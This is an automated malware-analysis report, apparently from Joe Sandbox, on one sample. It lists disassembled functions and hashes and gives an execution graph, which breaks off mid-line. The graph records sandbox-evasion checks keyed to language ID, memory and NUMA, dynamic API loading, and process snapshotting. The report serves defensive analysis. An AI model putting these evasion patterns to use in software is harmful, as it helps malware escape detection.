                                                  • Opcode ID: ec0c667621164707c1bc2b991c274cf4e18bf7ac853b3eeeb1e3ed5b34663cf6
                                                  • Instruction ID: 92ee9c0e94e9f2fbea2cc18d2d1159cfcb308c2a760149ff5b58bb71b949f05c
                                                  • Opcode Fuzzy Hash: ec0c667621164707c1bc2b991c274cf4e18bf7ac853b3eeeb1e3ed5b34663cf6
                                                  • Instruction Fuzzy Hash: 94F02430A84708B7DB10AB108D07B9EBB549B48B12F10403ABD0066281CAF95911A59D
                                                  Function 004352B1 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • InitializeCriticalSectionAndSpinCount.KERNEL32(00000FA0,-00000020,0043255D,-00000020,00000FA0,00000000,00000014,00402866), ref: 004352FC
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: CountCriticalInitializeSectionSpin
                                                  • String ID: 11@$InitializeCriticalSectionEx
                                                  • API String ID: 2593887523-3358978645
                                                  • Opcode ID: 4941b3bd5492a3ccd0429f2016fdf03f36fccdd9fbf1eb1f29f14e59228ea09c
                                                  • Instruction ID: 2051ed9e425ee247f5129d915950feebf7d6a3be7f43922744b44a15a137ba2f
                                                  • Opcode Fuzzy Hash: 4941b3bd5492a3ccd0429f2016fdf03f36fccdd9fbf1eb1f29f14e59228ea09c
                                                  • Instruction Fuzzy Hash: 2FF0B431A40208BBDB11AF51DD02D9F7F61EB08B51F10406AFD0556260DABA4E20EAC9
                                                  Function 004406AA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: H_prolog3_catch
                                                  • String ID: MOC$RCC
                                                  • API String ID: 3886170330-2084237596
                                                  • Opcode ID: c784227a34fd5b7084b2c87fc19ea1d0d793304ba4906a265f634d642bdce8b4
                                                  • Instruction ID: 34e8bc77d22ddcdafc14714ce60d9b0db4004f50fe154a236d7873180d633bee
                                                  • Opcode Fuzzy Hash: c784227a34fd5b7084b2c87fc19ea1d0d793304ba4906a265f634d642bdce8b4
                                                  • Instruction Fuzzy Hash: 83F06274600124DFDB22AF65D40159D7BB0AF41748F8640EBF5045B3A1C77C6D54CFAA
                                                  Function 004350DB Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 30COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: Free
                                                  • String ID: 11@$FlsFree
                                                  • API String ID: 3978063606-2352678666
                                                  • Opcode ID: 6dffc1cdda050d1ef236ec52a9cd275bb2632aad14ca1d18400e2b4c69ec58df
                                                  • Instruction ID: c1727abd3399064533d4b72406d339915fd92446a3417b7bd4380397cab03c3a
                                                  • Opcode Fuzzy Hash: 6dffc1cdda050d1ef236ec52a9cd275bb2632aad14ca1d18400e2b4c69ec58df
                                                  • Instruction Fuzzy Hash: 0FE0E532F41218ABD714AF559C07A6EBB60DB48F15F14017BFE0557281DA794E1096CE
                                                  Function 00435085 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 30memoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: Alloc
                                                  • String ID: 11@$FlsAlloc
                                                  • API String ID: 2773662609-288891599
                                                  • Opcode ID: ba89461f714ec2f353eb854be2fff552b03e75bb0e63386cb5f1b0964f268f00
                                                  • Instruction ID: 656933edcbb05ac72b6cf25421a562d2aaaa3326236b7023487c433eafd234ee
                                                  • Opcode Fuzzy Hash: ba89461f714ec2f353eb854be2fff552b03e75bb0e63386cb5f1b0964f268f00
                                                  • Instruction Fuzzy Hash: 62E05C30B8170477D314AF518C03A6EB760DB0AB11F10017BFC0127280DDBD5E1085CE
                                                  Function 00428D97 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • std::__non_rtti_object::__construct_from_string_literal.LIBVCRUNTIME ref: 00428DA3
                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00428DCA
                                                    • Part of subcall function 0042862D: RaiseException.KERNEL32(?,?,0040D8A3,00000000,00000000,00000000,00000000,?,?,?,?,0040D8A3,00000000,0045617C,00000000), ref: 0042868D
                                                  Strings
                                                  • Access violation - no RTTI data!, xrefs: 00428D9A
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: ExceptionException@8RaiseThrowstd::__non_rtti_object::__construct_from_string_literal
                                                  • String ID: Access violation - no RTTI data!
                                                  • API String ID: 2053020834-2158758863
                                                  • Opcode ID: a8d8be5bcc2d3cd607e2d3fdf15623eb14b1e6aa89af65ac363ffb51a07ec0b7
                                                  • Instruction ID: 704b7bedd41b8decca9880961208c58d7d7e72978fd60f0bb7cc7eac6645feb8
                                                  • Opcode Fuzzy Hash: a8d8be5bcc2d3cd607e2d3fdf15623eb14b1e6aa89af65ac363ffb51a07ec0b7
                                                  • Instruction Fuzzy Hash: 39E04FB2A593185A9A04EAD5B8478DE73EC9E24710BA0445FF900D2081EE2DF958866D
                                                  Function 00429FC5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • try_get_function.LIBVCRUNTIME ref: 00429FDA
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: try_get_function
                                                  • String ID: 11@$FlsAlloc
                                                  • API String ID: 2742660187-288891599
                                                  • Opcode ID: 8626dcbe6cdd30c54ada29f8a24cae781a39f5398ca56e55a922e5d7310b92a8
                                                  • Instruction ID: 02976f814a59a294967572ff2c8846d3634fef9e4185a681c56ac9216c02fddb
                                                  • Opcode Fuzzy Hash: 8626dcbe6cdd30c54ada29f8a24cae781a39f5398ca56e55a922e5d7310b92a8
                                                  • Instruction Fuzzy Hash: BDD0C231BC973663D5406B816D02B99BA048701FA3F110063F90CA1281D6994A1046CD
                                                  Function 004212DC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 17COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • std::invalid_argument::invalid_argument.LIBCONCRT ref: 004212FB
                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00421309
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: Exception@8Throwstd::invalid_argument::invalid_argument
                                                  • String ID: pThreadProxy
                                                  • API String ID: 1687795959-3651400591
                                                  • Opcode ID: d978fa9c7b04847c80681c11cf36977db16e70b896a80dd6198ffb22ffb34018
                                                  • Instruction ID: 5420a3ac49ee2b21aafe02425b7e31d130dadcb6d03c7143bde2fe2a0427303a
                                                  • Opcode Fuzzy Hash: d978fa9c7b04847c80681c11cf36977db16e70b896a80dd6198ffb22ffb34018
                                                  • Instruction Fuzzy Hash: 8FD05B71E0020896D700EBB9D806E4E77A85B10718F50417B7D14E6147DF78E508C6A8
                                                  Function 0041A897 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • Concurrency::details::ContextBase::CancellationBeaconStack::~CancellationBeaconStack.LIBCONCRT ref: 0041A8A1
                                                  • Hash.LIBCONCRT ref: 0041A8AE
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: BeaconCancellation$Base::Concurrency::details::ContextHashStackStack::~
                                                  • String ID: +hB
                                                  • API String ID: 3232699325-4272926976
                                                  • Opcode ID: 7ad862fe756be090a11e09584eb2edb8185e7db7bb7af1f5538142d7ac1213cc
                                                  • Instruction ID: 63ff50f5f99ebaa442bb0d4aeec8a7224868785c63155d6932f4acb55241cc7c
                                                  • Opcode Fuzzy Hash: 7ad862fe756be090a11e09584eb2edb8185e7db7bb7af1f5538142d7ac1213cc
                                                  • Instruction Fuzzy Hash: 2DD0A73230451156C708772AF8019C9F761BF80710B11403FE455935518F3838AF869D
                                                  Function 0042AEAA Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,f(@,00000000), ref: 0042AF40
                                                  • GetLastError.KERNEL32 ref: 0042AF4E
                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000), ref: 0042AFA9
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: ByteCharMultiWide$ErrorLast
                                                  • String ID:
                                                  • API String ID: 1717984340-0
                                                  • Opcode ID: 52d4a7004019297d44bc7c19dc2dfefffb9580c93fe43c28174d6fe013107c11
                                                  • Instruction ID: 120bd2143bdce8d71afc71d227a82de2ececf14487395c5eb9abd3a2316ebb2c
                                                  • Opcode Fuzzy Hash: 52d4a7004019297d44bc7c19dc2dfefffb9580c93fe43c28174d6fe013107c11
                                                  • Instruction Fuzzy Hash: 00414830700621EFCF228F66E944B6BBBA4EF01714F95416BFC699B290D7388D01C79A
                                                  Function 0303B111 Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000000,03012ACD,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,03012ACD,00000000), ref: 0303B1A7
                                                  • GetLastError.KERNEL32 ref: 0303B1B5
                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,03012ACD,00000000), ref: 0303B210
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3010000_mCe4hBfqCT.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ByteCharMultiWide$ErrorLast
                                                  • String ID:
                                                  • API String ID: 1717984340-0
                                                  • Opcode ID: 9c3ecb0086aef467e58ab233896f4880e68e88dda1315a5ce820fb7ae6c11677
                                                  • Instruction ID: a2c2e05a9406bfa3b291e80feec78488dd26cfcd433a718de12c691ec40ed0a9
                                                  • Opcode Fuzzy Hash: 9c3ecb0086aef467e58ab233896f4880e68e88dda1315a5ce820fb7ae6c11677
                                                  • Instruction Fuzzy Hash: 8841D735A0A205EFCF61CF69C8447BEBBECEF43715F184269E8599B1A1DB308901C790

                                                  Execution Graph

                                                  Execution Coverage:6.5%
                                                  Dynamic/Decrypted Code Coverage:4.9%
                                                  Signature Coverage:1%
                                                  Total number of Nodes:1419
                                                  Total number of Limit Nodes:28
                                                  execution_graph 27727 409440 strlen malloc strcpy_s free std::exception::exception 27785 2f0f8f1 32 API calls 27712 2d195d6 27713 2d195e5 27712->27713 27716 2d19d76 27713->27716 27717 2d19d91 27716->27717 27718 2d19d9a CreateToolhelp32Snapshot 27717->27718 27719 2d19db6 Module32First 27717->27719 27718->27717 27718->27719 27720 2d19dc5 27719->27720 27721 2d195ee 27719->27721 27723 2d19a35 27720->27723 27724 2d19a60 27723->27724 27725 2d19a71 VirtualAlloc 27724->27725 27726 2d19aa9 27724->27726 27725->27726 27726->27726 27786 2f130f9 7 API calls 27787 41ce48 LeaveCriticalSection __mtinitlocknum 27728 41b050 6 API calls 3 library calls 27831 2f135e4 9 API calls 27832 2f119e7 StrCmpCA ExitProcess strtok_s StrCmpCA strtok_s 27789 2f1cce9 162 API calls getSystemCP 27833 406f60 memcpy 27730 41dc60 atexit 27791 2f130d0 9 API calls 27834 410765 279 API calls 27794 417667 lstrcpy 27795 2f13823 9 API calls 27796 41b270 5 API calls 2 library calls 27767 2f113c7 strtok_s strtok_s 27798 2f1102b StrCmpCA strtok_s 27800 2f104b7 88 API calls 27801 2f10cb6 30 API calls 27741 2f06ebc VirtualProtect 27742 41bc11 71 API calls 2 library calls 27837 2f1cd90 173 API calls 2 library calls 27804 2f1d0af RtlLeaveCriticalSection type_info::_Type_info_dtor 27743 2f132ae 22 API calls 27744 2f1ae93 43 API calls 2 library calls 27745 2f10297 131 API calls 27747 41ac2c 71 API calls 2 library calls 27805 2f13823 6 API calls 27838 2f1118b strtok_s StrCmpCA strtok_s lstrlen lstrcpy 27839 2f1cd8f 6 API calls 2 library calls 27806 2f1102b StrCmpCA StrCmpCA strtok_s 27749 4090c3 5 API calls allocator 27684 2d19155 VirtualAlloc CreateToolhelp32Snapshot Module32First 27751 2f1cd97 170 API calls setSBUpLow 27752 2f1be78 162 API calls 2 library calls 27841 41abd0 free moneypunct std::exception::_Tidy 27842 2f0f567 56 API calls 27843 2f0fd67 152 API calls 27844 413916 91 API calls 2 library calls 27845 4183dc 15 API calls 27812 2f1140b strtok_s 27813 2f16c57 691 API calls 27753 4090e7 memcpy RaiseException codecvt __CxxThrowException@8 27814 2f1102b StrCmpCA strtok_s lstrlen lstrcpy 27815 41ceea SetUnhandledExceptionFilter 27848 2f16d18 645 API calls 26266 4169f0 26309 402260 26266->26309 26283 417850 3 API calls 26284 416a30 26283->26284 26285 4178e0 3 API calls 26284->26285 26286 416a43 26285->26286 26442 41a9b0 26286->26442 26288 416a64 26289 41a9b0 4 API calls 26288->26289 26290 416a6b 26289->26290 26291 41a9b0 4 API calls 26290->26291 26292 416a72 26291->26292 26293 41a9b0 4 API calls 26292->26293 26294 416a79 26293->26294 26295 41a9b0 4 API calls 26294->26295 26296 416a80 26295->26296 26450 41a8a0 26296->26450 26298 416b0c 26454 416920 GetSystemTime 26298->26454 26300 416a89 26300->26298 26301 416ac2 OpenEventA 26300->26301 26303 416af5 CloseHandle Sleep 26301->26303 26304 416ad9 26301->26304 26306 416b0a 26303->26306 26308 416ae1 CreateEventA 26304->26308 26306->26300 26307 416b16 CloseHandle ExitProcess 26308->26298 26651 4045c0 17 API calls 26309->26651 26311 402274 26312 4045c0 34 API calls 26311->26312 26313 40228d 26312->26313 26314 4045c0 34 API calls 26313->26314 26315 4022a6 26314->26315 26316 4045c0 34 API calls 26315->26316 26317 4022bf 26316->26317 26318 4045c0 34 API calls 26317->26318 26319 4022d8 26318->26319 26320 4045c0 34 API calls 26319->26320 26321 4022f1 26320->26321 26322 4045c0 34 API calls 26321->26322 26323 40230a 26322->26323 26324 4045c0 34 API calls 26323->26324 26325 402323 26324->26325 26326 4045c0 34 API calls 26325->26326 26327 40233c 26326->26327 26328 4045c0 34 API calls 26327->26328 26329 402355 26328->26329 26330 4045c0 34 API calls 26329->26330 26331 40236e 26330->26331 26332 4045c0 34 API calls 26331->26332 26333 402387 26332->26333 26334 4045c0 34 API calls 26333->26334 26335 4023a0 26334->26335 26336 4045c0 34 API calls 26335->26336 26337 4023b9 26336->26337 26338 4045c0 34 API calls 26337->26338 26339 4023d2 26338->26339 26340 4045c0 34 API calls 26339->26340 26341 4023eb 26340->26341 26342 4045c0 34 API calls 26341->26342 26343 402404 26342->26343 26344 4045c0 34 API calls 26343->26344 26345 40241d 26344->26345 26346 4045c0 34 API calls 26345->26346 26347 402436 26346->26347 26348 4045c0 34 API calls 26347->26348 26349 40244f 26348->26349 26350 4045c0 34 API calls 26349->26350 26351 402468 26350->26351 26352 4045c0 34 API calls 26351->26352 26353 402481 26352->26353 26354 4045c0 34 API calls 26353->26354 26355 40249a 26354->26355 26356 4045c0 34 API calls 26355->26356 26357 4024b3 26356->26357 26358 4045c0 34 API calls 26357->26358 26359 4024cc 26358->26359 26360 4045c0 34 API calls 26359->26360 26361 4024e5 26360->26361 26362 4045c0 34 API calls 26361->26362 26363 4024fe 26362->26363 26364 4045c0 34 API calls 26363->26364 26365 402517 26364->26365 26366 4045c0 34 API calls 26365->26366 26367 402530 26366->26367 26368 4045c0 34 API calls 26367->26368 26369 402549 26368->26369 26370 4045c0 34 API calls 26369->26370 26371 402562 26370->26371 26372 4045c0 34 API calls 26371->26372 26373 40257b 26372->26373 26374 4045c0 34 API calls 26373->26374 26375 402594 26374->26375 26376 4045c0 34 API calls 26375->26376 26377 4025ad 26376->26377 26378 4045c0 34 API calls 26377->26378 26379 4025c6 26378->26379 26380 4045c0 34 API calls 26379->26380 26381 4025df 26380->26381 26382 4045c0 34 API calls 26381->26382 26383 4025f8 26382->26383 26384 4045c0 34 API calls 26383->26384 26385 402611 26384->26385 26386 4045c0 34 API calls 26385->26386 26387 40262a 26386->26387 26388 4045c0 34 API calls 26387->26388 26389 402643 26388->26389 26390 4045c0 34 API calls 26389->26390 26391 40265c 26390->26391 26392 4045c0 34 API calls 26391->26392 26393 402675 26392->26393 26394 4045c0 34 API calls 26393->26394 26395 40268e 26394->26395 26396 419860 26395->26396 26655 419750 GetPEB 26396->26655 26398 419868 26399 419a93 LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA 26398->26399 26400 41987a 26398->26400 26401 419af4 GetProcAddress 26399->26401 26402 419b0d 26399->26402 26403 41988c 21 API calls 26400->26403 26401->26402 26404 419b46 26402->26404 26405 419b16 GetProcAddress GetProcAddress 26402->26405 26403->26399 26406 419b68 26404->26406 26407 419b4f GetProcAddress 26404->26407 26405->26404 26408 419b71 GetProcAddress 26406->26408 26409 419b89 26406->26409 26407->26406 26408->26409 26410 416a00 26409->26410 26411 419b92 GetProcAddress GetProcAddress 26409->26411 26412 41a740 26410->26412 26411->26410 26413 41a750 26412->26413 26414 416a0d 26413->26414 26415 41a77e lstrcpy 26413->26415 26416 4011d0 26414->26416 26415->26414 26417 4011e8 26416->26417 26418 401217 26417->26418 26419 40120f ExitProcess 26417->26419 26420 401160 GetSystemInfo 26418->26420 26421 401184 26420->26421 26422 40117c ExitProcess 26420->26422 26423 401110 GetCurrentProcess VirtualAllocExNuma 26421->26423 26424 401141 ExitProcess 26423->26424 26425 401149 26423->26425 26656 4010a0 VirtualAlloc 26425->26656 26428 401220 26660 4189b0 26428->26660 26431 401249 __aulldiv 26432 40129a 26431->26432 26433 401292 ExitProcess 26431->26433 26434 416770 GetUserDefaultLangID 26432->26434 26435 4167d3 GetUserDefaultLCID 26434->26435 26436 416792 26434->26436 26435->26283 26436->26435 26437 4167c1 ExitProcess 26436->26437 26438 4167a3 ExitProcess 26436->26438 26439 4167b7 ExitProcess 26436->26439 26440 4167cb ExitProcess 26436->26440 26441 4167ad ExitProcess 26436->26441 26662 41a710 26442->26662 26444 41a9c1 lstrlenA 26446 41a9e0 26444->26446 26445 41aa18 26663 41a7a0 26445->26663 26446->26445 26448 41a9fa lstrcpy lstrcatA 26446->26448 26448->26445 26449 41aa24 26449->26288 26451 41a8bb 26450->26451 26452 41a90b 26451->26452 26453 41a8f9 lstrcpy 26451->26453 26452->26300 26453->26452 26667 416820 26454->26667 26456 41698e 26457 416998 sscanf 26456->26457 26696 41a800 26457->26696 26459 4169aa SystemTimeToFileTime SystemTimeToFileTime 26460 4169e0 26459->26460 26461 4169ce 26459->26461 26463 415b10 26460->26463 26461->26460 26462 4169d8 ExitProcess 26461->26462 26464 415b1d 26463->26464 26465 41a740 lstrcpy 26464->26465 26466 415b2e 26465->26466 26698 41a820 lstrlenA 26466->26698 26469 41a820 2 API calls 26470 415b64 26469->26470 26471 41a820 2 API calls 26470->26471 26472 415b74 26471->26472 26702 416430 26472->26702 26475 41a820 2 API calls 26476 415b93 26475->26476 26477 41a820 2 API calls 26476->26477 26478 415ba0 26477->26478 26479 41a820 2 API calls 26478->26479 26480 415bad 26479->26480 26481 41a820 2 API calls 26480->26481 26482 415bf9 26481->26482 26711 4026a0 26482->26711 26490 415cc3 26491 416430 lstrcpy 26490->26491 26492 415cd5 26491->26492 26493 41a7a0 lstrcpy 26492->26493 26494 415cf2 26493->26494 26495 41a9b0 4 API calls 26494->26495 26496 415d0a 26495->26496 26497 41a8a0 lstrcpy 26496->26497 26498 415d16 26497->26498 26499 41a9b0 4 API calls 26498->26499 26500 415d3a 26499->26500 26501 41a8a0 lstrcpy 26500->26501 26502 415d46 26501->26502 26503 41a9b0 4 API calls 26502->26503 26504 415d6a 26503->26504 26505 41a8a0 lstrcpy 26504->26505 26506 415d76 26505->26506 26507 41a740 lstrcpy 26506->26507 26508 415d9e 26507->26508 27437 417500 GetWindowsDirectoryA 26508->27437 26511 41a7a0 lstrcpy 26512 415db8 26511->26512 27447 404880 26512->27447 26514 415dbe 27593 4117a0 26514->27593 26516 415dc6 26517 41a740 lstrcpy 26516->26517 26518 415de9 26517->26518 26519 401590 lstrcpy 26518->26519 26520 415dfd 26519->26520 27613 405960 39 API calls moneypunct 26520->27613 26522 415e03 27614 411050 strtok_s strtok_s lstrlenA lstrcpy 26522->27614 26524 415e0e 26525 41a740 lstrcpy 26524->26525 26526 415e32 26525->26526 26527 401590 lstrcpy 26526->26527 26528 415e46 26527->26528 27615 405960 39 API calls moneypunct 26528->27615 26530 415e4c 27616 410d90 7 API calls 26530->27616 26532 415e57 26533 41a740 lstrcpy 26532->26533 26534 415e79 26533->26534 26535 401590 lstrcpy 26534->26535 26536 415e8d 26535->26536 27617 405960 39 API calls moneypunct 26536->27617 26538 415e93 27618 410f40 strtok_s StrCmpCA strtok_s lstrlenA lstrcpy 26538->27618 26540 415e9e 26541 401590 lstrcpy 26540->26541 26542 415eb5 26541->26542 27619 411a10 121 API calls 26542->27619 26544 415eba 26545 41a740 lstrcpy 26544->26545 26546 415ed6 26545->26546 27620 404fb0 8 API calls 26546->27620 26548 415edb 26549 401590 lstrcpy 26548->26549 26550 415f5b 26549->26550 27621 410740 292 API calls 26550->27621 26552 415f60 26553 41a740 lstrcpy 26552->26553 26554 415f86 26553->26554 26555 401590 lstrcpy 26554->26555 26556 415f9a 26555->26556 27622 405960 39 API calls moneypunct 26556->27622 26558 415fa0 27623 411170 strtok_s StrCmpCA strtok_s lstrlenA lstrcpy 26558->27623 26560 415fab 26561 401590 lstrcpy 26560->26561 26562 415feb 26561->26562 27624 401e80 67 API calls 26562->27624 26564 415ff0 26565 416000 26564->26565 26566 416092 26564->26566 26567 41a740 lstrcpy 26565->26567 26568 41a7a0 lstrcpy 26566->26568 26570 416020 26567->26570 26569 4160a5 26568->26569 26571 401590 lstrcpy 26569->26571 26572 401590 lstrcpy 26570->26572 26573 4160b9 26571->26573 26574 416034 26572->26574 27628 405960 39 API calls moneypunct 26573->27628 27625 405960 39 API calls moneypunct 26574->27625 26577 4160bf 27629 413560 36 API calls 26577->27629 26578 41603a 27626 4112d0 21 API calls moneypunct 26578->27626 26581 41608a 26585 401590 lstrcpy 26581->26585 26615 41610b 26581->26615 26582 416045 26583 401590 lstrcpy 26582->26583 26584 416085 26583->26584 27627 413dc0 75 API calls 26584->27627 26588 4160e7 26585->26588 26587 401590 lstrcpy 26589 41612b 26587->26589 27630 4140b0 64 API calls moneypunct 26588->27630 27632 414780 116 API calls moneypunct 26589->27632 26590 401590 lstrcpy 26594 416150 26590->26594 26592 41617a 26598 401590 lstrcpy 26592->26598 26600 41619f 26592->26600 27633 414bb0 67 API calls moneypunct 26594->27633 26595 4160ec 26603 401590 lstrcpy 26595->26603 26596 401590 lstrcpy 26597 416175 26596->26597 27634 414d70 75 API calls 26597->27634 26606 41619a 26598->26606 26599 416130 26599->26590 26608 416155 26599->26608 26601 4161c4 26600->26601 26607 401590 lstrcpy 26600->26607 26604 4161e9 26601->26604 26610 401590 lstrcpy 26601->26610 26609 416106 26603->26609 26611 416210 26604->26611 26617 401590 lstrcpy 26604->26617 27635 414f40 69 API calls moneypunct 26606->27635 26613 4161bf 26607->26613 26608->26592 26608->26596 27631 415100 71 API calls 26609->27631 26616 4161e4 26610->26616 26618 416220 26611->26618 26619 4162b3 26611->26619 27636 407710 125 API calls moneypunct 26613->27636 26615->26587 26615->26599 27637 415050 67 API calls moneypunct 26616->27637 26622 416209 26617->26622 26624 41a740 lstrcpy 26618->26624 26623 41a7a0 lstrcpy 26619->26623 27638 419010 54 API calls moneypunct 26622->27638 26626 4162c6 26623->26626 26627 416241 26624->26627 26628 401590 lstrcpy 26626->26628 26629 401590 lstrcpy 26627->26629 26631 4162da 26628->26631 26630 416255 26629->26630 27639 405960 39 API calls moneypunct 26630->27639 27642 405960 39 API calls moneypunct 26631->27642 26634 41625b 27640 4112d0 21 API calls moneypunct 26634->27640 26635 4162e0 27643 413560 36 API calls 26635->27643 26638 4162ab 26641 41a7a0 lstrcpy 26638->26641 26639 416266 26640 401590 lstrcpy 26639->26640 26642 4162a6 26640->26642 26643 4162fc 26641->26643 27641 413dc0 75 API calls 26642->27641 26645 401590 lstrcpy 26643->26645 26646 416310 26645->26646 27644 405960 39 API calls moneypunct 26646->27644 26648 41631c 26650 416338 26648->26650 27645 416630 9 API calls moneypunct 26648->27645 26650->26307 26654 404697 26651->26654 26652 4046ac 11 API calls 26652->26654 26653 40474f 6 API calls 26653->26311 26654->26652 26654->26653 26655->26398 26658 4010c2 moneypunct 26656->26658 26657 4010fd 26657->26428 26658->26657 26659 4010e2 VirtualFree 26658->26659 26659->26657 26661 401233 GlobalMemoryStatusEx 26660->26661 26661->26431 26662->26444 26664 41a7c2 26663->26664 26665 41a7ec 26664->26665 26666 41a7da lstrcpy 26664->26666 26665->26449 26666->26665 26668 41a740 lstrcpy 26667->26668 26669 416833 26668->26669 26670 41a9b0 4 API calls 26669->26670 26671 416845 26670->26671 26672 41a8a0 lstrcpy 26671->26672 26673 41684e 26672->26673 26674 41a9b0 4 API calls 26673->26674 26675 416867 26674->26675 26676 41a8a0 lstrcpy 26675->26676 26677 416870 26676->26677 26678 41a9b0 4 API calls 26677->26678 26679 41688a 26678->26679 26680 41a8a0 lstrcpy 26679->26680 26681 416893 26680->26681 26682 41a9b0 4 API calls 26681->26682 26683 4168ac 26682->26683 26684 41a8a0 lstrcpy 26683->26684 26685 4168b5 26684->26685 26686 41a9b0 4 API calls 26685->26686 26687 4168cf 26686->26687 26688 41a8a0 lstrcpy 26687->26688 26689 4168d8 26688->26689 26690 41a9b0 4 API calls 26689->26690 26691 4168f3 26690->26691 26692 41a8a0 lstrcpy 26691->26692 26693 4168fc 26692->26693 26694 41a7a0 lstrcpy 26693->26694 26695 416910 26694->26695 26695->26456 26697 41a812 26696->26697 26697->26459 26699 41a83f 26698->26699 26700 415b54 26699->26700 26701 41a87b lstrcpy 26699->26701 26700->26469 26701->26700 26703 41a8a0 lstrcpy 26702->26703 26704 416443 26703->26704 26705 41a8a0 lstrcpy 26704->26705 26706 416455 26705->26706 26707 41a8a0 lstrcpy 26706->26707 26708 416467 26707->26708 26709 41a8a0 lstrcpy 26708->26709 26710 415b86 26709->26710 26710->26475 26712 4045c0 34 API calls 26711->26712 26713 4026b4 26712->26713 26714 4045c0 34 API calls 26713->26714 26715 4026d7 26714->26715 26716 4045c0 34 API calls 26715->26716 26717 4026f0 26716->26717 26718 4045c0 34 API calls 26717->26718 26719 402709 26718->26719 26720 4045c0 34 API calls 26719->26720 26721 402736 26720->26721 26722 4045c0 34 API calls 26721->26722 26723 40274f 26722->26723 26724 4045c0 34 API calls 26723->26724 26725 402768 26724->26725 26726 4045c0 34 API calls 26725->26726 26727 402795 26726->26727 26728 4045c0 34 API calls 26727->26728 26729 4027ae 26728->26729 26730 4045c0 34 API calls 26729->26730 26731 4027c7 26730->26731 26732 4045c0 34 API calls 26731->26732 26733 4027e0 26732->26733 26734 4045c0 34 API calls 26733->26734 26735 4027f9 26734->26735 26736 4045c0 34 API calls 26735->26736 26737 402812 26736->26737 26738 4045c0 34 API calls 26737->26738 26739 